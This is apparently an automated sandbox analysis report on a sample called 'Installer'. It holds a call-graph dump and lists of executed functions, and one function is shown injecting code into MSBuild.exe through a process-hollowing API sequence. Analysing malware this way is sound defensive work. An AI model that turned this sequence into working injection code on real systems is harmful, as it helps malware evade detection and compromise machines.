___free_lconv_mon 14 API calls 22228->22230 22229->22227 22230->22231 22231->22034 22233 3632a0 22232->22233 22234 3632b1 22233->22234 22236 3632c4 ___from_strstr_to_strchr 22233->22236 22235 3576e4 __Wcrtomb 14 API calls 22234->22235 22244 3632b6 22235->22244 22237 3634db 22236->22237 22239 3632e4 22236->22239 22238 3576e4 __Wcrtomb 14 API calls 22237->22238 22240 3634e0 22238->22240 22295 363500 22239->22295 22242 35bed7 ___free_lconv_mon 14 API calls 22240->22242 22242->22244 22244->21990 22245 363328 22281 363314 22245->22281 22299 36351a 22245->22299 22246 36332a 22250 35d2b4 __Getctype 14 API calls 22246->22250 22246->22281 22248 363306 22253 363323 22248->22253 22254 36330f 22248->22254 22252 363338 22250->22252 22251 35bed7 ___free_lconv_mon 14 API calls 22251->22244 22256 35bed7 ___free_lconv_mon 14 API calls 22252->22256 22258 363500 39 API calls 22253->22258 22257 3576e4 __Wcrtomb 14 API calls 22254->22257 22255 36339d 22259 35bed7 ___free_lconv_mon 14 API calls 22255->22259 22260 363343 22256->22260 22257->22281 22258->22245 22265 3633a5 22259->22265 22260->22245 22263 35d2b4 __Getctype 14 API calls 22260->22263 22260->22281 22261 3633e8 22262 3628b5 std::ios_base::_Init 32 API calls 22261->22262 22261->22281 22264 363416 22262->22264 22266 36335f 22263->22266 22268 35bed7 ___free_lconv_mon 14 API calls 22264->22268 22272 3633d2 22265->22272 22303 3628b5 22265->22303 22270 35bed7 ___free_lconv_mon 14 API calls 22266->22270 22267 3634d0 22271 35bed7 ___free_lconv_mon 14 API calls 22267->22271 22268->22272 22270->22245 22271->22244 22272->22267 22275 35d2b4 __Getctype 14 API calls 22272->22275 22272->22281 22273 3633c9 22274 35bed7 ___free_lconv_mon 14 API calls 22273->22274 22274->22272 22276 363461 22275->22276 22277 363471 22276->22277 22278 363469 22276->22278 22280 35bb4c ___std_exception_copy 29 API calls 22277->22280 22279 35bed7 ___free_lconv_mon 14 API calls 22278->22279 22279->22281 22282 36347d 22280->22282 22281->22251 22283 363484 22282->22283 22284 3634f5 22282->22284 22312 36a23c 22283->22312 22285 357dfc __Getctype 11 API calls 22284->22285 22287 3634ff 22285->22287 22296 36350d 22295->22296 22298 3632ef 22295->22298 22327 36356f 22296->22327 22298->22245 22298->22246 22298->22248 22300 36338d 22299->22300 22302 363530 22299->22302 22300->22255 22300->22261 22302->22300 22342 36a14b 22302->22342 22304 3628c2 22303->22304 22305 3628dd 22303->22305 22304->22305 22306 3628ce 22304->22306 22309 3628ec 22305->22309 22376 369a54 22305->22376 22308 3576e4 __Wcrtomb 14 API calls 22306->22308 22311 3628d3 __fread_nolock 22308->22311 22383 3662a0 22309->22383 22311->22273 22395 35d275 22312->22395 22317 35d275 39 API calls 22322 36a28c 22317->22322 22318 36a2af 22319 36a2bb 22318->22319 22320 35bed7 ___free_lconv_mon 14 API calls 22318->22320 22320->22319 22328 363582 22327->22328 22335 36357d 22327->22335 22329 35d2b4 __Getctype 14 API calls 22328->22329 22339 36359f 22329->22339 22330 36360d 22332 358353 CallUnexpected 39 API calls 22330->22332 22331 3635fc 22333 35bed7 ___free_lconv_mon 14 API calls 22331->22333 22334 363612 22332->22334 22333->22335 22336 357dfc __Getctype 11 API calls 22334->22336 22335->22298 22337 36361e 22336->22337 22338 35d2b4 __Getctype 14 API calls 22338->22339 22339->22330 22339->22331 22339->22334 22339->22338 22340 35bed7 ___free_lconv_mon 14 API calls 22339->22340 22341 35bb4c ___std_exception_copy 29 API calls 22339->22341 22340->22339 22341->22339 22343 36a15f 22342->22343 22344 36a159 22342->22344 22343->22302 22345 36a973 22344->22345 22346 36a9bb 22344->22346 22348 36a979 22345->22348 22350 36a996 22345->22350 22358 36a9d1 22346->22358 22349 3576e4 __Wcrtomb 14 API calls 22348->22349 22352 36a97e 22349->22352 22354 3576e4 __Wcrtomb 14 API calls 22350->22354 22357 36a9b4 22350->22357 22351 36a989 22351->22302 22353 357dcf __strnicoll 29 API calls 22352->22353 22353->22351 22355 36a9a5 22354->22355 22356 357dcf __strnicoll 29 API calls 22355->22356 22356->22351 22357->22302 22359 36a9e1 22358->22359 22360 36a9fb 22358->22360 22363 3576e4 __Wcrtomb 14 API calls 22359->22363 22361 36aa03 22360->22361 22362 36aa1a 22360->22362 22364 3576e4 __Wcrtomb 14 API calls 22361->22364 22365 36aa26 22362->22365 22366 36aa3d 22362->22366 22367 36a9e6 22363->22367 22368 36aa08 22364->22368 22369 3576e4 __Wcrtomb 14 API calls 22365->22369 22373 35297a __strnicoll 39 API calls 22366->22373 22374 36a9f1 22366->22374 22370 357dcf __strnicoll 29 API calls 22367->22370 22371 357dcf __strnicoll 29 API calls 22368->22371 22372 36aa2b 22369->22372 22370->22374 22371->22374 22375 357dcf __strnicoll 29 API calls 22372->22375 22373->22374 22374->22351 22375->22374 22377 369a74 HeapSize 22376->22377 22378 369a5f 22376->22378 22377->22309 22379 3576e4 __Wcrtomb 14 API calls 22378->22379 22380 369a64 22379->22380 22381 357dcf __strnicoll 29 API calls 22380->22381 22382 369a6f 22381->22382 22382->22309 22384 3662ad 22383->22384 22385 3662b8 22383->22385 22386 35bf11 __fread_nolock 15 API calls 22384->22386 22387 3662c0 22385->22387 22393 3662c9 __Getctype 22385->22393 22391 3662b5 22386->22391 22388 35bed7 ___free_lconv_mon 14 API calls 22387->22388 22388->22391 22389 3662f3 HeapReAlloc 22389->22391 22389->22393 22390 3662ce 22392 3576e4 __Wcrtomb 14 API calls 22390->22392 22391->22311 22392->22391 22393->22389 22393->22390 22394 355877 codecvt 2 API calls 22393->22394 22394->22393 22396 35297a __strnicoll 39 API calls 22395->22396 22397 35d287 22396->22397 22398 35d299 22397->22398 22403 35ca46 22397->22403 22400 352a74 22398->22400 22406 352acc 22400->22406 22404 35d05b std::_Lockit::_Lockit 5 API calls 22403->22404 22405 35ca4e 22404->22405 22405->22398 22407 352af4 22406->22407 22408 352ada 22406->22408 22410 352afb 22407->22410 22411 352b1a 22407->22411 22424 352a5a 22408->22424 22416 352a8c 22410->22416 22428 352a1b 22410->22428 22412 35bf5f __fread_nolock MultiByteToWideChar 22411->22412 22414 352b29 22412->22414 22415 352b30 GetLastError 22414->22415 22418 352b56 22414->22418 22420 352a1b 15 API calls 22414->22420 22416->22317 22416->22318 22418->22416 22420->22418 22425 352a65 22424->22425 22426 352a6d 22424->22426 22427 35bed7 ___free_lconv_mon 14 API calls 22425->22427 22426->22416 22427->22426 22429 352a5a 14 API calls 22428->22429 22430 352a29 22429->22430 22445 355356 22444->22445 22446 35536a 22444->22446 22447 3576e4 __Wcrtomb 14 API calls 22445->22447 22465 3553da 22446->22465 22449 35535b 22447->22449 22451 357dcf __strnicoll 29 API calls 22449->22451 22453 355366 22451->22453 22452 35537f CreateThread 22454 35539e GetLastError 22452->22454 22455 3553aa 22452->22455 22482 355470 22452->22482 22453->21840 22456 35770a __dosmaperr 14 API calls 22454->22456 22474 35542a 22455->22474 22456->22455 22458 3553b5 22458->21840 22460 34f134 22459->22460 22461 34253a 22459->22461 22462 34f151 CloseHandle 22460->22462 22463 34f13b GetExitCodeThread 22460->22463 22461->21851 22461->21853 22462->22461 22463->22461 22464 34f14c 22463->22464 22464->22462 22466 35d2b4 __Getctype 14 API calls 22465->22466 22467 3553eb 22466->22467 22468 35bed7 ___free_lconv_mon 14 API calls 22467->22468 22469 3553f8 22468->22469 22470 35541c 22469->22470 22471 3553ff GetModuleHandleExW 22469->22471 22472 35542a 16 API calls 22470->22472 22471->22470 22473 355376 22472->22473 22473->22452 22473->22455 22475 355436 22474->22475 22476 35545a 22474->22476 22477 355445 22475->22477 22478 35543c CloseHandle 22475->22478 22476->22458 22479 355454 22477->22479 22480 35544b FreeLibrary 22477->22480 22478->22477 22481 35bed7 ___free_lconv_mon 14 API calls 22479->22481 22480->22479 22481->22476 22483 35547c ___scrt_is_nonwritable_in_current_image 22482->22483 22484 355490 22483->22484 22485 355483 GetLastError ExitThread 22483->22485 22486 35c16a __Getctype 39 API calls 22484->22486 22487 355495 22486->22487 22496 35f767 22487->22496 22489 3554ac 22500 3553cc 22489->22500 22497 3554a0 22496->22497 22498 35f777 CallUnexpected 22496->22498 22497->22489 22503 35cde0 22497->22503 22498->22497 22506 35ce89 22498->22506 22509 3554ee 22500->22509 22504 35cfd6 __Getctype 5 API calls 22503->22504 22505 35cdfc 22504->22505 22505->22489 22507 35cfd6 __Getctype 5 API calls 22506->22507 22508 35cea5 22507->22508 22508->22497 22510 35c2bb __dosmaperr 14 API calls 22509->22510 22513 3554f9 22510->22513 22511 35553b ExitThread 22512 355512 22515 355525 22512->22515 22516 35551e CloseHandle 22512->22516 22513->22511 22513->22512 22518 35ce1b 22513->22518 22515->22511 22517 355531 FreeLibraryAndExitThread 22515->22517 22516->22515 22517->22511 22519 35cfd6 __Getctype 5 API calls 22518->22519 22520 35ce34 22519->22520 22520->22512 22522 35324d 22521->22522 22524 35325f ___scrt_uninitialize_crt 22521->22524 22523 35325b 22522->22523 22526 35854a 22522->22526 22523->21872 22524->21872 22529 358675 22526->22529 22532 35874e 22529->22532 22533 35875a ___scrt_is_nonwritable_in_current_image 22532->22533 22540 3580e1 EnterCriticalSection 22533->22540 22535 3587d0 22549 3587ee 22535->22549 22539 358764 ___scrt_uninitialize_crt 22539->22535 22541 3586c2 22539->22541 22540->22539 22542 3586ce ___scrt_is_nonwritable_in_current_image 22541->22542 22552 353315 EnterCriticalSection 22542->22552 22544 358711 22564 358742 22544->22564 22545 3586d8 ___scrt_uninitialize_crt 22545->22544 22553 358553 22545->22553 22609 3580f8 LeaveCriticalSection 22549->22609 22551 358551 22551->22523 22552->22545 22554 358568 _Fputc 22553->22554 22609->22551 22610 37a19e 22612 37a1d4 22610->22612 22611 37a321 GetPEB 22613 37a333 CreateProcessW VirtualAlloc Wow64GetThreadContext ReadProcessMemory VirtualAllocEx 22611->22613 22612->22611 22612->22613 22616 37a3ca TerminateProcess 22612->22616 22613->22612 22614 37a3da WriteProcessMemory 22613->22614 22615 37a41f 22614->22615 22617 37a424 WriteProcessMemory 22615->22617 22618 37a461 WriteProcessMemory Wow64SetThreadContext ResumeThread 22615->22618 22616->22612 22617->22615

                                                                                                                                                                                                                                                    Executed Functions

                                                                                                                                                                                                                                                    Function 0037A19E Relevance: 44.0, APIs: 11, Strings: 14, Instructions: 295threadinjectionmemoryCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • CreateProcessW.KERNELBASE(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,0037A110,0037A100), ref: 0037A334
                                                                                                                                                                                                                                                    • VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 0037A347
                                                                                                                                                                                                                                                    • Wow64GetThreadContext.KERNEL32(000002B8,00000000), ref: 0037A365
                                                                                                                                                                                                                                                    • ReadProcessMemory.KERNELBASE(000002B4,?,0037A154,00000004,00000000), ref: 0037A389
                                                                                                                                                                                                                                                    • VirtualAllocEx.KERNELBASE(000002B4,?,?,00003000,00000040), ref: 0037A3B4
                                                                                                                                                                                                                                                    • TerminateProcess.KERNELBASE(000002B4,00000000), ref: 0037A3D3
                                                                                                                                                                                                                                                    • WriteProcessMemory.KERNELBASE(000002B4,00000000,?,?,00000000,?), ref: 0037A40C
                                                                                                                                                                                                                                                    • WriteProcessMemory.KERNELBASE(000002B4,00400000,?,?,00000000,?,00000028), ref: 0037A457
                                                                                                                                                                                                                                                    • WriteProcessMemory.KERNELBASE(000002B4,?,?,00000004,00000000), ref: 0037A495
                                                                                                                                                                                                                                                    • Wow64SetThreadContext.KERNEL32(000002B8,032B0000), ref: 0037A4D1
                                                                                                                                                                                                                                                    • ResumeThread.KERNELBASE(000002B8), ref: 0037A4E0
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1672739230.000000000037A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672696127.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672708420.0000000000341000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672726152.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672750713.000000000037B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672763497.000000000037F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672774226.0000000000382000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672798149.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_340000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Process$Memory$ThreadWrite$AllocContextVirtualWow64$CreateReadResumeTerminate
                                                                                                                                                                                                                                                    • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe$CreateProcessW$GetP$GetThreadContext$Load$ReadProcessMemory$ResumeThread$SetThreadContext$TerminateProcess$VirtualAlloc$VirtualAllocEx$WriteProcessMemory$aryA$ress
                                                                                                                                                                                                                                                    • API String ID: 2440066154-3857624555
                                                                                                                                                                                                                                                    • Opcode ID: 4d4c1a7e65f8d0d38951af6025ef960edc15c7aa7ffa2998c2434409f37e51df
                                                                                                                                                                                                                                                    • Instruction ID: 549bc118f5f50fd8d8a5eb605d7098f349ce8d303b309335ae4d8d0457d2ed12
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4d4c1a7e65f8d0d38951af6025ef960edc15c7aa7ffa2998c2434409f37e51df
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6BB1077660064AAFDB60CF68CC80BDA73A5FF88714F158524EA0CAB341D774FA51CB94
                                                                                                                                                                                                                                                    Function 00341FB0 Relevance: 9.2, APIs: 6, Instructions: 200fileCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 00341240: _strlen.LIBCMT ref: 003412BA
                                                                                                                                                                                                                                                    • CreateFileA.KERNELBASE ref: 00342036
                                                                                                                                                                                                                                                    • GetFileSize.KERNEL32(00000000,00000000), ref: 00342046
                                                                                                                                                                                                                                                    • ReadFile.KERNELBASE(00000000,00000000,00000000,?,00000000), ref: 0034206B
                                                                                                                                                                                                                                                    • CloseHandle.KERNELBASE(00000000), ref: 0034207A
                                                                                                                                                                                                                                                    • _strlen.LIBCMT ref: 003420CD
                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 003421FD
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1672708420.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672696127.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672726152.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672739230.000000000037A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672750713.000000000037B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672763497.000000000037F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672774226.0000000000382000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672798149.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_340000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: File$CloseHandle_strlen$CreateReadSize
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2911764282-0
                                                                                                                                                                                                                                                    • Opcode ID: 5f51098b35952cafcf61c8b906805e299bb77ce8e53e764ba8c0260528e33cd9
                                                                                                                                                                                                                                                    • Instruction ID: b9aa5d24326e26988dc5b3429dede176647a62f2cdeb772af169db629587cc50
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5f51098b35952cafcf61c8b906805e299bb77ce8e53e764ba8c0260528e33cd9
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5471D0B2C006089BCB12DFA4DC45BAEBBF5BF48314F150629F814BB391E775A945CBA1
                                                                                                                                                                                                                                                    Function 00341000 Relevance: 1.3, Strings: 1, Instructions: 89COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1672708420.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672696127.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672726152.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672739230.000000000037A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672750713.000000000037B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672763497.000000000037F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672774226.0000000000382000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672798149.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_340000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID: p6
                                                                                                                                                                                                                                                    • API String ID: 0-3779050237
                                                                                                                                                                                                                                                    • Opcode ID: 49ee100148ccc27d6c9ebe680740623eb26d6e5a5534ca1fbd75a656a07f8329
                                                                                                                                                                                                                                                    • Instruction ID: 121275928345a6242f5c1eb7cc2ab4c0b1a98f26b4e9bbe64ee32d7356dcc964
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 49ee100148ccc27d6c9ebe680740623eb26d6e5a5534ca1fbd75a656a07f8329
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9E214C336105650B87AE9F386D62037FBCADBC66A0706573EED129F2D1E521ED9082E4
                                                                                                                                                                                                                                                    Function 003424B0 Relevance: 10.6, APIs: 7, Instructions: 83threadCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetConsoleWindow.KERNELBASE ref: 003424DD
                                                                                                                                                                                                                                                    • ShowWindow.USER32(00000000,00000000), ref: 003424E6
                                                                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 00342524
                                                                                                                                                                                                                                                      • Part of subcall function 0034F11D: WaitForSingleObjectEx.KERNEL32(?,000000FF,00000000,?,?,?,0034253A,?,?,00000000), ref: 0034F129
                                                                                                                                                                                                                                                      • Part of subcall function 0034F11D: GetExitCodeThread.KERNEL32(?,00000000,?,?,0034253A,?,?,00000000), ref: 0034F142
                                                                                                                                                                                                                                                      • Part of subcall function 0034F11D: CloseHandle.KERNEL32(?,?,?,0034253A,?,?,00000000), ref: 0034F154
                                                                                                                                                                                                                                                    • std::_Throw_Cpp_error.LIBCPMT ref: 00342567
                                                                                                                                                                                                                                                    • std::_Throw_Cpp_error.LIBCPMT ref: 00342578
                                                                                                                                                                                                                                                    • std::_Throw_Cpp_error.LIBCPMT ref: 00342589
                                                                                                                                                                                                                                                    • std::_Throw_Cpp_error.LIBCPMT ref: 0034259A
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1672708420.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672696127.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672726152.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672739230.000000000037A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672750713.000000000037B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672763497.000000000037F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672774226.0000000000382000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672798149.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_340000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Cpp_errorThrow_std::_$ThreadWindow$CloseCodeConsoleCurrentExitHandleObjectShowSingleWait
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3956949563-0
                                                                                                                                                                                                                                                    • Opcode ID: 3ccacfe30d1597e36426a3c35a6b90c606c3be31d44b7d1fbfa4157e2295af21
                                                                                                                                                                                                                                                    • Instruction ID: 2c8a740766a7d515d8ecb75ffee1ce2b2aa4b59a0e0ed38ab1b06a6d59380b5c
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3ccacfe30d1597e36426a3c35a6b90c606c3be31d44b7d1fbfa4157e2295af21
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 472174F2D402159BDF12AF949C06BDFBAF8AF04710F080165F9087E291E7B6B554CBA6
                                                                                                                                                                                                                                                    Function 0035CF0B Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74COMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 50 35cf0b-35cf17 51 35cfa9-35cfac 50->51 52 35cfb2 51->52 53 35cf1c-35cf2d 51->53 54 35cfb4-35cfb8 52->54 55 35cf2f-35cf32 53->55 56 35cf3a-35cf53 LoadLibraryExW 53->56 57 35cfd2-35cfd4 55->57 58 35cf38 55->58 59 35cf55-35cf5e GetLastError 56->59 60 35cfb9-35cfc9 56->60 57->54 62 35cfa6 58->62 63 35cf97-35cfa4 59->63 64 35cf60-35cf72 call 360554 59->64 60->57 61 35cfcb-35cfcc FreeLibrary 60->61 61->57 62->51 63->62 64->63 67 35cf74-35cf86 call 360554 64->67 67->63 70 35cf88-35cf95 LoadLibraryExW 67->70 70->60 70->63
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,00000000,00000800,00000000,?,?,C82EE5EC,?,0035D01A,?,?,00000000), ref: 0035CFCC
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1672708420.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672696127.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672726152.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672739230.000000000037A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672750713.000000000037B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672763497.000000000037F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672774226.0000000000382000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672798149.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_340000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: FreeLibrary
                                                                                                                                                                                                                                                    • String ID: api-ms-$ext-ms-
                                                                                                                                                                                                                                                    • API String ID: 3664257935-537541572
                                                                                                                                                                                                                                                    • Opcode ID: f8608a2687a9ae2a0c022313fa8d6f8727e5bc3deecbbd76761d8a31658c17cb
                                                                                                                                                                                                                                                    • Instruction ID: 657c2cce6cffb0c270b6987f3b3fe28868177f020f009fd6f6d6db500577adeb
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f8608a2687a9ae2a0c022313fa8d6f8727e5bc3deecbbd76761d8a31658c17cb
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2F210231A11711AFCB338B64DC51E5AB76EDF4176AF261111ED0AA72A0DB30ED08CBD0
                                                                                                                                                                                                                                                    Function 00341750 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 390COMMON
                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 126 341750-3417eb call 359c30 129 341806-34180b 126->129 130 3417ed-341803 126->130 131 34180d-341816 129->131 132 34181b-341821 129->132 130->129 134 341b69-341b8c 131->134 135 341851-341855 132->135 136 341823-341825 132->136 138 341be4-341c48 call 342f00 call 3432c0 call 35060c 134->138 139 341b8e-341b95 call 34d748 134->139 137 341858-341898 call 344460 135->137 136->135 140 341827-341849 call 342c50 136->140 163 3418ca-3418e0 137->163 164 34189a-3418b4 137->164 138->134 150 341b97-341b9a call 3438e0 139->150 151 341b9f-341bad 139->151 140->134 152 34184f 140->152 150->151 156 341bd1-341be3 151->156 157 341baf-341bce 151->157 152->137 157->156 165 3418e6-3418f5 163->165 166 3419b9 163->166 164->163 182 3418b6-3418c6 164->182 168 3419bb-3419c1 165->168 169 3418fb 165->169 166->168 171 3419ff-341a03 168->171 172 341900-341914 169->172 175 341a92-341a96 171->175 176 341a09-341a11 171->176 173 341916-34191d 172->173 174 341940-341965 172->174 173->174 180 34191f-34192f 173->180 184 341968-341972 174->184 178 341b54-341b61 175->178 179 341a9c-341aa6 175->179 176->175 181 341a13-341a59 176->181 178->134 179->178 183 341aac 179->183 180->184 201 341a68-341a89 call 34def0 181->201 202 341a5b-341a62 181->202 182->163 186 341ab0-341ac4 183->186 188 341974-341992 184->188 189 3419aa-3419b2 184->189 192 341ac6-341acd 186->192 193 341af0-341b1c 186->193 188->172 195 341998-3419a8 188->195 191 3419b5-3419b7 189->191 191->168 192->193 196 341acf-341ae3 192->196 199 341b1e-341b47 193->199 203 341b4f 193->203 195->191 198 341ae5 196->198 196->199 198->203 199->186 205 341b4d 199->205 209 341a8b-341a8d 201->209 202->201 204 3419d0-3419dd 202->204 203->178 206 3419e0-3419fc 204->206 205->178 206->171 209->206
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1672708420.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672696127.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672726152.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672739230.000000000037A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672750713.000000000037B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672763497.000000000037F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672774226.0000000000382000.00000008.00000001.01000000.00000003.sdmpDownload File
